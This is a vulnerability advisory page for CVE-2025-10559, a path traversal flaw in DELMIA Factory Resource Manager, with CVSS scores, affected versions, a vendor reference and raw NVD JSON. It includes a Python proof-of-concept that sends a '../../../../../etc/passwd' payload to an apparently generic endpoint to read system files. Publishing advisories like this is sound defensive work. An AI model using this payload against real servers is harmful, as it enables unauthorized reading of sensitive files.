Security Vulnerability Report
CVE-2025-10559 CVSS 7.1 HIGH

Published: 2026-03-31 09:16:22
Last Modified: 2026-04-06 15:17:20

Description

A Path Traversal vulnerability affecting Factory Resource Management in DELMIA Factory Resource Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to read or write files in specific directories on the server.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:3ds:3dexperience:*:*:*:*:*:*:*:* - VULNERABLE
DELMIA Factory Resource Manager 3DEXPERIENCE R2023x
DELMIA Factory Resource Manager 3DEXPERIENCE R2024x
DELMIA Factory Resource Manager 3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the vulnerable DELMIA component
target_url = "http://target-server/api/factory-resource"

# Attacker controlled session cookie (Low privilege required)
cookies = {
    "session_id": "attacker_low_privilege_session_token"
}

# Path traversal payload to read a sensitive file
# Adjust the path based on the server OS (e.g., ../../windows/win.ini for Windows)
payload = {
    "resource_path": "../../../../../etc/passwd"
}

try:
    # Sending the GET request with the malicious payload
    response = requests.get(target_url, params=payload, cookies=cookies, timeout=10)

    # Check if the request was successful and content is returned
    if response.status_code == 200 and "root:" in response.text:
        print("[+] Exploit successful! File content retrieved:")
        print(response.text)
    else:
        print(f"[-] Exploit failed or file not found. Status: {response.status_code}")
        print(response.text[:200])
except requests.exceptions.RequestException as e:
    print(f"[!] An error occurred: {e}")

References

https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10559 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10559", "sourceIdentifier": "[email protected]", "published": "2026-03-31T09:16:21.970", "lastModified": "2026-04-06T15:17:19.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Path Traversal vulnerability affecting Factory Resource Management in DELMIA Factory Resource Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to read or write files in specific directories on the server."}, {"lang": "es", "value": "Una vulnerabilidad de salto de ruta que afecta a la Gestión de Recursos de Fábrica en DELMIA Factory Resource Manager desde la versión 3DEXPERIENCE R2023x hasta la versión 3DEXPERIENCE R2025x permite a un atacante leer o escribir archivos en directorios específicos en el servidor."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:3ds:3dexperience:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2023x", "versionEndIncluding": "r2025x", "matchCriteriaId": "5D800681-01F0-43E4-9525-BE188167D292"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10559", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}